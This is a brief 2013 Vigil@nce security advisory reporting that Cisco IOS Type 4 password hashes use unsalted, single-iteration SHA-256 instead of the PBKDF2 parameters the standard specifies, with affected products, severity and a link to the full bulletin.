Vigil@nce - Cisco IOS: weakness of Type 4 Password
April 2013 by Vigil@nce
This bulletin was written by Vigil@nce : http://vigilance.fr/offer
SYNTHESIS OF THE VULNERABILITY
When the system uses passwords hashed with the Type 4 algorithm,
the RFC is not honored, which weakens the hash.
– Impacted products: IOS, Cisco Router xx00 Series
– Severity: 2/4
– Creation date: 18/03/2013
DESCRIPTION OF THE VULNERABILITY
The Cisco IOS system uses several hashing algorithms, to store
passwords.
The type 4 algorithm uses the RFC 2898 (Password-Based Key
Derivation Function version 2). In theory, Cisco IOS should use
the following parameters:
– hash function SHA-256
– salt of 80 bits
– 1000 hashing iterations
However, due to a coding error, passwords are only hashed with
SHA-256, without using a salt, and with no iteration.
When the system uses passwords hashed with the Type 4 algorithm,
the RFC is not honored, which therefore weakens the hash.
ACCESS TO THE COMPLETE VIGIL@NCE BULLETIN
http://vigilance.fr/vulnerability/Cisco-IOS-weakness-of-Type-4-Password-12541